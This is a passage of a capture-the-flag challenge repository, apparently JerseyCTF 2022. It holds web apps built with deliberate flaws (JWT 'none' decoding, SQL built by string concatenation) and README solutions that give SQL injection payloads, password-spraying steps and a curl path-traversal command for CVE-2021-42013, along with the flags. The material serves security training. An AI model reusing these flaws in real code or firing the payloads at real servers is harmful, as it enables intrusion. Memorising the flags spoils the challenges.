= jwt.decode(token, algorithms=["none"], options={"verify_signature": False}) 36 | else: 37 | abort(400, "Invalid JWT algorithm") 38 | except Exception: 39 | abort(400, "Error decoding token") 40 | 41 | 42 | if "username" not in decoded: 43 | abort(400, "Username missing in JWT") 44 | 45 | return decoded["username"] 46 | 47 | 48 | # Flask Routes 49 | @app.errorhandler(400) 50 | def handle_error(error): 51 | return render_template("error.html", error=error), 400 52 | 53 | 54 | @app.route("/") 55 | def index(): 56 | token = request.cookies.get("user", None) 57 | return render_template("index.html", user=decode_user(token)) 58 | 59 | 60 | @app.route("/dashboard") 61 | def dashboard(): 62 | token = request.cookies.get("user", None) 63 | if not token: 64 | flash("You must be logged in to access this page", "danger") 65 | session["next"] = dashboard.__name__ 66 | return redirect(url_for(login.__name__)) 67 | 68 | return render_template("dashboard.html", user=decode_user(token), flag=flag) 69 | 70 | 71 | @app.route("/login", methods=["GET", "POST"]) 72 | def login(): 73 | if "user" in request.cookies: 74 | flash("Already logged in", "danger") 75 | return redirect(url_for(index.__name__)) 76 | 77 | if request.method == "GET": 78 | return render_template("login.html", user=None) 79 | 80 | username = request.form["username"] 81 | 82 | if username == "": 83 | flash("Username cannot be empty", "danger") 84 | return redirect(url_for(login.__name__)) 85 | 86 | if username == "admin": 87 | flash("Sorry, you can't login as admin", "danger") 88 | return redirect(url_for(login.__name__)) 89 | 90 | redirect_url = session.pop("next", index.__name__) 91 | 92 | resp = make_response(redirect(url_for(redirect_url))) 93 | resp.set_cookie("user", encode_user(username)) 94 | 95 | return resp 96 | 97 | 98 | @app.route("/logout") 99 | def logout(): 100 | resp = make_response(redirect(url_for(index.__name__))) 101 | resp.set_cookie("user", "", expires=0) 102 | return resp 103 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/requirements.txt: -------------------------------------------------------------------------------- 1 | cffi==1.15.0 2 | click==8.0.4 3 | cryptography==36.0.1 4 | Flask==2.0.3 5 | itsdangerous==2.1.0 6 | Jinja2==3.0.3 7 | MarkupSafe==2.1.0 8 | pycparser==2.21 9 | PyJWT==2.3.0 10 | python-dotenv==0.19.2 11 | Werkzeug==2.0.3 12 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/static/cookie.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/web/cookie-factory/challenge/static/cookie.png -------------------------------------------------------------------------------- /web/cookie-factory/challenge/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Granny's Cookies 7 | 8 | 9 | 10 | 17 | 18 | 19 | 20 |
21 | 39 | 40 |
41 | {% with messages = get_flashed_messages(with_categories=true) %} 42 | {% if messages %} 43 | {% for category, message in messages %} 44 | 45 | {% endfor %} 46 | {% endif %} 47 | {% endwith %} 48 | 49 | {% block content %} 50 | {% endblock %} 51 |
52 |
53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/templates/dashboard.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 | 6 | 7 | 8 |

9 | Granny's Cookies Sales Statistics 10 |

11 | 12 |
13 |
14 |
15 |
Record Profits!
16 |
17 |

Our profits are steadily climbing!

18 | 35 |
36 |
37 |
38 |
39 |
40 |
Record Sales!
41 |
42 |

So are our sales numbers!

43 | 60 |
61 |
62 |
63 |
64 |
65 |
Customer Satisfaction
66 |
67 |

Our users love Granny's Old-Fashioned Home-Baked Cookies!

68 |

😟 ➕ 🍪 ➡️ 😀

69 |
70 |
71 |
72 |
73 |
74 |
Flag
75 |
76 | {% if user == "admin" %} 77 |

Welcome admin! The flag is {{ flag }}.

78 | {% else %} 79 |

Sorry, but this information is only for the admin's eyes!

80 |

81 | Here at Granny's Old-Fashioned Home-Baked Cookie Factory, 82 | we're proud to say that we take security very seriously. 83 | Therefore, you won't be able to hack us, because we definitely don't have any 84 | critical vulnerabilities 85 | in our code. 86 |

87 | {% endif %} 88 |
89 |
90 |
91 |
92 | 93 | {% endblock %} 94 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/templates/error.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

Whoops!

6 | 7 |

Sorry, we encountered the following error: {{ error }}.

8 | 9 | {% endblock %} 10 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

6 | Welcome to Granny's Old-Fashioned Home-Baked Cookie Factory! 7 |

8 | 9 |

10 | We mix the nostalgia-inducing taste of Granny's cookie recipes with the great things about today's modern world: 11 | low prices, easy convenience, and top-notch security. 12 | Especially that last one. 13 | Trust us! 14 |

15 | 16 |
17 |
Latest News
18 |
19 |
A Global Hit!
20 |

FOR IMMEDIATE RELEASE: In the last quarter, Granny's Cookie Factory reached record profit levels!

21 | See Dashboard 22 |
23 |
24 | 25 | {% endblock %} 26 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

Login

6 | 7 |
8 |
9 | 10 | 11 |
12 |
13 | 14 | 15 |
16 | 17 |
18 | 19 | {% endblock %} 20 | -------------------------------------------------------------------------------- /web/flag-vault/README.md: -------------------------------------------------------------------------------- 1 | # Flag Storage Vault 2 | 3 | ## Challenge Text 4 | * I'm very organized. I even keep all of my flags neatly organized in a database! But, these are my flags! You don't have access to them... or do you? Start here: jerseyctf-flag-vault.chals.io 5 | 6 | ## Hint 7 | * What is the most common type of database? 8 | * What is the flag format? How does that help you? 9 | 10 | ## Solution 11 | * Recognize that the vulnerability is SQL Injection 12 | * On the login page, put `admin` as the username and `' OR 1=1;--` as the password (or similar payload) 13 | * On the flags page, try `' OR 1=1;--` again 14 | * Realize that it doesn't work here because there are fake flags and only one item is returned 15 | * Use `' OR flag LIKE 'jctf{%` to get the flag with the correct format 16 | * Flag: `jctf{ALMOST_LIKE_A_NEEDLE_IN_A_HAYSTACK}` 17 | 18 | ## Credit 19 | * Developed by Edward 20 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/.dockerignore: -------------------------------------------------------------------------------- 1 | .git 2 | .gitignore 3 | 4 | Dockerfile 5 | .dockerignore 6 | 7 | env 8 | .env 9 | 10 | **/__pycache__ 11 | **/*.py[cdo] 12 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.2-slim 2 | 3 | WORKDIR /app 4 | 5 | RUN pip install --no-cache-dir gunicorn 6 | 7 | COPY requirements.txt . 8 | RUN pip install --no-cache-dir -r requirements.txt 9 | 10 | COPY app.py . 11 | COPY static static 12 | COPY templates templates 13 | 14 | EXPOSE 80 15 | 16 | CMD ["gunicorn", "app:app", "-b", "0.0.0.0:80"] 17 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/app.py: -------------------------------------------------------------------------------- 1 | from apscheduler.schedulers.background import BackgroundScheduler 2 | from dotenv import load_dotenv 3 | from flask import Flask, Markup, flash, g, redirect, render_template, request, session, url_for 4 | from uuid import uuid4 5 | import datetime 6 | import os 7 | import random 8 | import sqlite3 9 | import string 10 | import time 11 | 12 | app = Flask(__name__) 13 | 14 | 15 | # Load secret environment variables 16 | load_dotenv() 17 | 18 | app.secret_key = os.getenv("FLASK_SECRET_KEY", "".join(random.choice(string.ascii_letters) for _ in range(32))) 19 | admin_password = os.getenv("ADMIN_PASSWORD", "".join(random.choice(string.ascii_letters) for _ in range(32))) 20 | 21 | flag = os.getenv("FLAG", "jctf{ALMOST_LIKE_A_NEEDLE_IN_A_HAYSTACK}") 22 | db_name = os.getenv("DATABASE", "temp.db") 23 | 24 | 25 | # Helper function 26 | def get_db(): 27 | db = getattr(g, "_database", None) 28 | if db is None: 29 | db = sqlite3.connect(db_name) 30 | db.row_factory = sqlite3.Row 31 | g._database = db 32 | return db 33 | 34 | 35 | # Setup database tables 36 | def generate_fake_flag(): 37 | prefix = "jctf" 38 | while prefix == "jctf": 39 | prefix = "".join(random.choice(string.ascii_lowercase) for _ in range(4)) 40 | flag = "".join(random.choice(string.ascii_letters + string.digits + "_") for _ in range(random.randint(8, 40))) 41 | return prefix + "{" + flag + "}" 42 | 43 | 44 | def setup_db(): 45 | with app.app_context(): 46 | db = get_db() 47 | 48 | # Setup admin user once 49 | cur = db.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='users'") 50 | if len(cur.fetchall()) == 0: 51 | db.execute("CREATE TABLE users (username TEXT, password TEXT)") 52 | db.execute("INSERT INTO users (username, password) VALUES ('admin', ?)", (admin_password,)) 53 | 54 | # Create flags table first time to prevent "no such table" 55 | db.execute("CREATE TABLE IF NOT EXISTS flags (id TEXT, flag TEXT)") 56 | db.commit() 57 | 58 | # Reset flags table each time 59 | num_flags = random.randint(100_000, 1_000_000) - 2 # We add 2 flags manually 60 | flags = [generate_fake_flag() for _ in range(num_flags)] 61 | flags.append(flag) 62 | random.shuffle(flags) 63 | 64 | flags.insert(0, generate_fake_flag()) 65 | flags = [(str(uuid4()), f) for f in flags] 66 | 67 | db.execute("CREATE TABLE flags_new (id TEXT, flag TEXT)") 68 | db.executemany("INSERT INTO flags_new (id, flag) VALUES (?, ?)", flags) 69 | db.execute("DROP TABLE flags") 70 | db.execute("ALTER TABLE flags_new RENAME TO flags") 71 | db.commit() 72 | 73 | 74 | scheduler = BackgroundScheduler() 75 | scheduler.add_job(setup_db, "interval", minutes=5, next_run_time=datetime.datetime.now()) 76 | scheduler.start() 77 | 78 | 79 | # Flask Routes 80 | @app.route("/") 81 | def index(): 82 | username = session.get("user", None) 83 | return render_template("index.html", user=username) 84 | 85 | 86 | @app.route("/login", methods=["GET", "POST"]) 87 | def login(): 88 | if "user" in session: 89 | flash("Already logged in", "dark") 90 | return redirect(url_for(index.__name__)) 91 | 92 | if request.method == "GET": 93 | return render_template("login.html", user=None) 94 | 95 | username = request.form["username"] 96 | password = request.form["password"] 97 | 98 | db = get_db() 99 | cur = db.execute("SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'") 100 | user = cur.fetchone() 101 | if user is None: 102 | flash("Username and password not found", "danger") 103 | return redirect(url_for(login.__name__)) 104 | 105 | session["user"] = user["username"] 106 | redirect_url = session.pop("next", index.__name__) 107 | return redirect(url_for(redirect_url)) 108 | 109 | 110 | @app.route("/logout") 111 | def logout(): 112 | session.pop("user", None) 113 | return redirect(url_for(index.__name__)) 114 | 115 | 116 | @app.route("/flags", methods=["GET", "POST"]) 117 | def flags(): 118 | if "user" not in session or session["user"] != "admin": 119 | flash(Markup("You must be logged in as the admin user to access this page"), "danger") 120 | session["next"] = flags.__name__ 121 | return redirect(url_for(login.__name__)) 122 | 123 | if request.method == "GET": 124 | return render_template("flags.html", user=session["user"]) 125 | 126 | start_time = time.time() 127 | 128 | db = get_db() 129 | cur = db.execute("SELECT * FROM flags WHERE id='" + request.form["id"] + "'") 130 | res = cur.fetchall() 131 | 132 | if len(res) == 0: 133 | flash("No matching flags found", "danger") 134 | return redirect(url_for(flags.__name__)) 135 | 136 | res_id = res[0]["id"] 137 | res_flag = res[0]["flag"] 138 | 139 | if flag == res_flag: 140 | flash( 141 | Markup(""" 142 |

Congratulations! You found the flag!

143 |

The entry with id=%s has flag=%s.

144 | """ % (res_id, res_flag) 145 | ), 146 | "success" 147 | ) 148 | else: 149 | flash( 150 | Markup(""" 151 |

Here's what your search returned:

152 |

The entry with id=%s has flag=%s.

153 |

About %d result%s (%.3f seconds)

154 | """ % ( 155 | res_id, 156 | res_flag, 157 | len(res), 158 | "s" if len(res) > 1 else "", 159 | time.time() - start_time, 160 | ) 161 | ), 162 | "dark" 163 | ) 164 | 165 | return redirect(url_for(flags.__name__)) 166 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/requirements.txt: -------------------------------------------------------------------------------- 1 | APScheduler==3.9.1 2 | click==8.0.4 3 | Flask==2.0.3 4 | itsdangerous==2.1.0 5 | Jinja2==3.0.3 6 | MarkupSafe==2.1.0 7 | python-dotenv==0.19.2 8 | pytz==2021.3 9 | pytz-deprecation-shim==0.1.0.post0 10 | six==1.16.0 11 | tzdata==2021.5 12 | tzlocal==4.1 13 | Werkzeug==2.0.3 14 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/static/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/web/flag-vault/challenge/static/flag.png -------------------------------------------------------------------------------- /web/flag-vault/challenge/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Flag Storage Vault 7 | 8 | 9 | 10 | 34 | 35 | 36 | 37 |
38 | 56 | 57 |
58 | {% with messages = get_flashed_messages(with_categories=true) %} 59 | {% if messages %} 60 | {% for category, message in messages %} 61 | 62 | {% endfor %} 63 | {% endif %} 64 | {% endwith %} 65 | 66 | {% block content %} 67 | {% endblock %} 68 |
69 |
70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/templates/error.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

Whoops!

6 | 7 |

Sorry, we encountered the following error: {{ error }}.

8 | 9 | {% endblock %} 10 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/templates/flags.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

The Vault

6 | 7 |

8 | Welcome back me! 9 | Your flags are still here, just waiting to be queried! 10 |

11 |

12 | If you're somehow not me and you managed to get here, please get out. 13 | This is top-secret flag stuff. 14 | Well, at the very least, it's not like you'll find the true jctf flag in all the fakes! 15 | Hahahahaha. 16 |

17 | 18 |
19 | 20 |
21 |
22 | 23 | 24 |
25 | 26 |
27 | 28 | 29 | {% endblock %} 30 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

Well, well, well...

6 | 7 |

It seems that you've found the secret stash of flags I've been keeping.

8 | 9 |

10 | If you're reading this message and you're not me, just turn back now. 11 | I'm not going to let you see my collection of flags. 12 | Plus, I have these flags stored in the safest database I could set up. 13 | It's literally 100% unhackable. 14 |

15 | 16 |

17 | If, on the other hand, you are me, then welcome back! 18 | Your—err, I mean my—flags are waiting right 19 | here. 20 |

21 | 22 | {% endblock %} 23 | -------------------------------------------------------------------------------- /web/flag-vault/challenge/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block content %} 4 | 5 |

Login

6 | 7 |
8 |
9 | 10 | 11 |
12 |
13 | 14 | 15 |
16 | 17 |
18 | 19 | {% endblock %} 20 | -------------------------------------------------------------------------------- /web/heres-my-password/README.md: -------------------------------------------------------------------------------- 1 | # heres-my-password 2 | 3 | ## Challenge Text 4 | * Here's the deal - we have a list of 500 users (males, females, and pets) and one password. Log-in with the proper credentials for the flag. 5 | * The password is `lightswitchon_and_offLOL26` and the website is www.jerseyctf.online. 6 | 7 | ## Hint 8 | * This is not intended to require manual brute force. What are some other types of brute force methods? 9 | 10 | ## Solution 11 | * Utilize BurpSuite (free version works) to conduct a password spraying brute force attack. 12 | * Configure web browser to be connected to the Burp proxy by setting the HTTP proxy to 127.0.0.1:8080. 13 | * With Intercept enabled in the Proxy tab, navigate to the site and submit any username with the provided password. The POST request will be tracked, and switch over to the HTTP history in the Proxy tab. 14 | * Right click the POST method for the www.jerseyctf.online host, and click Send to Intruder. 15 | * In Positions, click Clear on the right. Highlight the username that was inputted and click Add on the right. 16 | * In Payloads, click Load and select the provided users.txt file. Click Start attack, and then click the Length filter twice so that it orders from greatest to least. In ~5-10 minutes of running the attack, the correct user `Wolverine` will have a larger length than the rest because it logged-in and provided the flag in an alert. Navigate to the site and enter in the proper credentials to see the flag or simply read it in Burp. 17 | * Flag: `jctf{c0NGR@T2_y0U_p@22wORd_SPR@y3D!}` 18 | * Shares website with osint/contributor challenge. 19 | 20 | ## Credit 21 | * Developed by [Andrew](https://github.com/peppermintpatty5) and [Logan](https://github.com/Git-Logan) 22 | * Additional Resources: https://owasp.org/www-community/attacks/Password_Spraying_Attack and https://www.youtube.com/watch?v=QcQT4acDbnk 23 | -------------------------------------------------------------------------------- /web/heres-my-password/challenge/users.txt: -------------------------------------------------------------------------------- 1 | Kayden 2 | Ignacio 3 | Bruce 4 | Carmelo 5 | Aditya 6 | Izayah 7 | Seamus 8 | Chandler 9 | Tyler 10 | Xavier 11 | Joseph 12 | Roy 13 | Tyson 14 | Yurem 15 | Alfredo 16 | Colton 17 | Rolando 18 | Christopher 19 | Colt 20 | Clarence 21 | Cyrus 22 | Shamar 23 | Aydin 24 | Prince 25 | Kamren 26 | Kane 27 | Curtis 28 | Alvin 29 | Gianni 30 | Trenton 31 | Dean 32 | Esteban 33 | Beckham 34 | Dereon 35 | Marshall 36 | Hector 37 | Desmond 38 | Lewis 39 | Saul 40 | Jameson 41 | Maverick 42 | Rory 43 | Conner 44 | Brock 45 | Ramon 46 | Eliezer 47 | Nickolas 48 | Cody 49 | Antoine 50 | Jaylon 51 | Javon 52 | Caden 53 | Ronin 54 | Kaleb 55 | Logan 56 | Mateo 57 | Paxton 58 | Clayton 59 | Frankie 60 | Aaron 61 | Frederick 62 | Kaiden 63 | Derick 64 | Quinton 65 | John 66 | Fernando 67 | Tristen 68 | Yandel 69 | Grayson 70 | Raiden 71 | Jordyn 72 | Brent 73 | River 74 | Mitchell 75 | Andrew 76 | Darrell 77 | Bernard 78 | Reid 79 | Arjun 80 | Keagan 81 | Tommy 82 | Bryson 83 | Kylan 84 | Samson 85 | Alfonso 86 | Kale 87 | Shawn 88 | Kody 89 | Callum 90 | Damian 91 | Alan 92 | Jamal 93 | Glenn 94 | Jeremiah 95 | Pierce 96 | Emerson 97 | Gustavo 98 | Jerimiah 99 | Jayce 100 | Manuel 101 | Heath 102 | Zion 103 | Edward 104 | Bennett 105 | Vicente 106 | Oscar 107 | Kenneth 108 | Charles 109 | Blaine 110 | Antwan 111 | Abram 112 | Matteo 113 | Scott 114 | Cannon 115 | Braxton 116 | Wolverine 117 | Reese 118 | Mohammed 119 | Cael 120 | Branson 121 | Gunnar 122 | Joe 123 | Harrison 124 | Vincent 125 | DRodgers 126 | Quinten 127 | Armando 128 | Lena 129 | Maya 130 | Mireya 131 | Veronica 132 | Kaley 133 | Courtney 134 | Alina 135 | Ariella 136 | Kamila 137 | Ainsley 138 | Jane 139 | Imani 140 | Mollie 141 | Skylar 142 | Jaliyah 143 | Lauren 144 | Marlene 145 | Parker 146 | Alexia 147 | Amiyah 148 | Dylan 149 | Alivia 150 | Camryn 151 | Eva 152 | Cristina 153 | Maeve 154 | Rosemary 155 | Kaitlin 156 | Selah 157 | Kimberly 158 | Mariana 159 | Bailee 160 | Aleena 161 | Brenna 162 | Angelica 163 | Kadence 164 | Alena 165 | Amaya 166 | Jillian 167 | Celeste 168 | Marley 169 | Lucille 170 | Fiona 171 | Addisyn 172 | Ruth 173 | Rebekah 174 | Kinley 175 | Yamilet 176 | Kylie 177 | Shea 178 | Jaylen 179 | Jordan 180 | Alejandra 181 | Ansley 182 | Krista 183 | Halle 184 | Karli 185 | Tessa 186 | Morgan 187 | Journey 188 | Meredith 189 | Kenzie 190 | Kyra 191 | Brittany 192 | Lilian 193 | Elsa 194 | Kendall 195 | Katrina 196 | Mckinley 197 | Isabelle 198 | Ashleigh 199 | Amy 200 | Myla 201 | Sidney 202 | Jasmine 203 | Paloma 204 | Arielle 205 | Francesca 206 | Mareli 207 | Annabelle 208 | Kara 209 | Jazlyn 210 | Dayami 211 | Janet 212 | Helen 213 | Asia 214 | Luz 215 | Kaitlynn 216 | Chelsea 217 | Adrianna 218 | Emelia 219 | Mikayla 220 | Raquel 221 | Lilia 222 | Jaidyn 223 | Jaqueline 224 | Amber 225 | Kamryn 226 | Anna 227 | Daphne 228 | Katelynn 229 | Kayley 230 | Noelle 231 | Raven 232 | Shirley 233 | Elaine 234 | Carissa 235 | Lia 236 | Sylvia 237 | Sarahi 238 | Emilee 239 | Abigayle 240 | Tia 241 | Kaelyn 242 | Regan 243 | Emmalee 244 | Charlie 245 | Phoebe 246 | Chloe 247 | Helena 248 | Kayleigh 249 | Nicole 250 | Savanna 251 | Bandit 252 | Chico 253 | Henry 254 | Nala 255 | Chance 256 | Brady 257 | Sherman 258 | Monkey 259 | Jack 260 | Astro 261 | Otis 262 | Sasha 263 | Luke 264 | Lacey 265 | Bruiser 266 | Hank 267 | Macy 268 | Fiona 269 | Ava 270 | Shadow 271 | Oscar 272 | Marley 273 | Holly 274 | Rocco 275 | Bubba 276 | Oliver 277 | Sandy 278 | Luna 279 | Olive 280 | Zoe 281 | Rudy 282 | Hannah 283 | Dolce 284 | Frankie 285 | Panda 286 | Simba 287 | Cookie 288 | Romeo 289 | Bear 290 | Samson 291 | Jasper 292 | Josie 293 | Benny 294 | Bruce 295 | Emma 296 | Jeter 297 | Delilah 298 | Lady 299 | Gizmo 300 | Dixie 301 | Zoey 302 | Diesel 303 | Maya 304 | Harley 305 | Dexter 306 | Katie 307 | Loki 308 | Leo 309 | Blue 310 | Chase 311 | Cooper 312 | Guinness 313 | Jax 314 | Cash 315 | Ellie 316 | Bud 317 | Gucci 318 | Riley 319 | Izzy 320 | Ginger 321 | Winston 322 | Koda 323 | Coco 324 | Annie 325 | Winnie 326 | Puppy 327 | Maggie 328 | Bonnie 329 | Sam 330 | Mimi 331 | Roxie 332 | Sydney 333 | Yoda 334 | Mercedes 335 | Scout 336 | Champ 337 | Kahlua 338 | Bruno 339 | Sophie 340 | Minnie 341 | Raven 342 | Rusty 343 | Honey 344 | Kona 345 | Chanel 346 | Rex 347 | Maximus 348 | Ollie 349 | Ranger 350 | Rocky 351 | Toby 352 | Callie 353 | Finn 354 | Missy 355 | Cody 356 | Tank 357 | Sammy 358 | Beau 359 | Tucker 360 | Hazel 361 | Benji 362 | Louie 363 | Ruby 364 | Jake 365 | Millie 366 | Gigi 367 | Samantha 368 | Alex 369 | Miley 370 | Shelby 371 | Lily 372 | Bentley 373 | Madison 374 | Zara 375 | Sally 376 | Casey 377 | Brewster 378 | Porter 379 | Cleo 380 | Oakley 381 | Jameson 382 | Buddy 383 | Dakota 384 | Rufus 385 | Ziggy 386 | Mac 387 | Layla 388 | Mocha 389 | Roxy 390 | Milo 391 | Lucy 392 | Cocoa 393 | Brandy 394 | Stella 395 | Missie 396 | Baxter 397 | Lola 398 | Joey 399 | Molly 400 | Lilly 401 | George 402 | Harry 403 | Penelope 404 | Penny 405 | Payton 406 | Prince 407 | Murphy 408 | Teddy 409 | Mickey 410 | Chewy 411 | Hunter 412 | Brutus 413 | Ace 414 | Baby 415 | Willow 416 | Piper 417 | Foster 418 | Zeus 419 | Nina 420 | Copper 421 | Peanut 422 | Bella 423 | Tyson 424 | Sassy 425 | Lucky 426 | Belle 427 | Nikki 428 | Thor 429 | Wrigley 430 | Daisy 431 | Chloe 432 | Abby 433 | Jasmine 434 | Tiger 435 | Apollo 436 | Roscoe 437 | Max 438 | Allie 439 | Boomer 440 | Sugar 441 | Oreo 442 | Jackson 443 | Moose 444 | Gus 445 | Polo 446 | Sadie 447 | Angel 448 | Grace 449 | Kobe 450 | Heidi 451 | Abbie 452 | Maddie 453 | Bo 454 | Rosie 455 | Chester 456 | Princess 457 | Lexi 458 | Pepper 459 | Brody 460 | Phoebe 461 | Whiskey 462 | Dodger 463 | Gracie 464 | Sparky 465 | Buster 466 | Foxy 467 | Scooter 468 | Maverick 469 | Athena 470 | Cisco 471 | Mia 472 | Ella 473 | Cricket 474 | Gunner 475 | Bailey 476 | Charlie 477 | Trixie 478 | Shiner 479 | Duke 480 | Lulu 481 | Rocky 482 | Chester 483 | Salem 484 | Houdini 485 | Bandit 486 | Jasmine 487 | Luna 488 | Angel 489 | Precious 490 | Tigger 491 | Max 492 | Twiggy 493 | Mimi 494 | Snickers 495 | Maggie 496 | Peanut 497 | Sox 498 | Sugar 499 | Blackie 500 | Mittens 501 | -------------------------------------------------------------------------------- /web/heres-my-password/forgot_password.php: -------------------------------------------------------------------------------- 1 | [ 6 | "q" => "What was your first job's company name?", 7 | "a" => "Bank Heist Security 101" 8 | ], 9 | "q2" => [ 10 | "q" => "What city was your high school located in?", 11 | "a" => "Rahway", 12 | ], 13 | "q3" => [ 14 | "q" => "What is your favorite sport?", 15 | "a" => "Arm wrestling" 16 | ] 17 | ]; 18 | 19 | function showFirstForm() 20 | { 21 | ?> 22 |
23 | 26 | 27 |
28 | 35 |

Security Questions

36 |
37 | $question) { ?> 39 | 42 |
43 | 44 | 45 |
46 | 52 | 55 | 60 | 63 | 64 | 65 | 66 | 67 | 68 | Forgot Password 69 | 70 | 71 | 72 |

Forgot Password

73 | 74 | $question) { 91 | if ($_POST[$question_id] !== $question["a"]) { 92 | $missed_question = $question; 93 | break; 94 | } 95 | } 96 | if ($missed_question === null) { 97 | showFirstForm(); 98 | scriptAlert(FLAG); 99 | } else { 100 | showSecondForm(); 101 | scriptAlert("Incorrect Answer(s)"); 102 | } 103 | } 104 | } else { 105 | showFirstForm(); 106 | } ?> 107 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /web/heres-my-password/index.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | 10 | 11 | Login 12 | 13 | 14 | 15 |

Login

16 |
17 | 20 |
21 | 24 |
25 | 26 |
27 | Forgot Password? 28 | 31 | 34 | 35 | 38 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /web/road-not-taken/README.md: -------------------------------------------------------------------------------- 1 | # road-not-taken 2 | 3 | ## Challenge Text 4 | * You've reached a fork in the road! Choose the right path to find your way to the flag. Start here: https://jerseyctf-road-not-taken.chals.io/ 5 | 6 | ## Hint 7 | * Recent CVEs may help you find your way. 8 | 9 | ## Solution 10 | * curl -v --path-as-is https://jerseyctf-road-not-taken.chals.io/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/root/flag.txt 11 | 12 | * Flag: `jctf{CVE-2021-42013}` 13 | 14 | ## Credit 15 | * Developed by [Rob Bruder](https://github.com/njccicrob) 16 | -------------------------------------------------------------------------------- /web/road-not-taken/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM vulhub/httpd:2.4.50 2 | 3 | COPY flag.txt /root 4 | 5 | COPY httpd.conf /usr/local/apache2/conf/ 6 | 7 | COPY index.html /usr/local/apache2/htdocs/ 8 | 9 | COPY jerseyctfiilogowithtext.png /usr/local/apache2/htdocs/ 10 | 11 | RUN chmod a+x /root 12 | 13 | EXPOSE 8080 14 | -------------------------------------------------------------------------------- /web/road-not-taken/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | jctf{CVE-2021-42013} 2 | -------------------------------------------------------------------------------- /web/road-not-taken/challenge/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |

Welcome to JerseyCTF 2!

6 | jerseyctflogo 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /web/road-not-taken/challenge/jerseyctfiilogowithtext.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/web/road-not-taken/challenge/jerseyctfiilogowithtext.png -------------------------------------------------------------------------------- /web/seigwards-secrets/README.md: -------------------------------------------------------------------------------- 1 | # seigwards-secrets 2 | 3 | ## Challenge Text 4 | 5 | * Seigward has been storing his secrets on his website https://jerseyctf.co for decades. Hasn't failed him yet. 6 | 7 | ## Hint 8 | 9 | * Where can you find a website's code? 10 | 11 | ## Solution 12 | 13 | * The password, which is the flag, is stored in the source code for the website, encoded in base64. All you need to do is find it and decode it. 14 | * Flag: `jctf{1M_s0_1M_5o_Dyn4Mit3_092478}` 15 | 16 | ## Credit 17 | 18 | * Developed by [Rajat Patel](https://github.com/PAndaContron/) and [Yousef Attia](https://github.com/YousefAttia-git/) 19 | -------------------------------------------------------------------------------- /web/seigwards-secrets/challenge/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | Seigwards secrets ;) 10 | 27 | 28 | 29 | 30 |
31 |
32 |
33 | 37 |
38 |
39 | 40 | 41 | 44 | 45 | 48 | 49 | 52 | 53 | 54 | 57 | 58 | 59 |
60 | 62 | 63 |
64 | 65 | 66 |
67 | 69 | 70 |
71 | 72 | 73 | 74 | 82 | 83 |
84 | 86 | 88 |
89 | 90 |
91 |
92 |
93 |
94 |
95 | 96 |
97 | Copyright © 2022. All rights reserved. 98 |
99 | 100 | 101 | 102 | 116 | 117 |
118 |
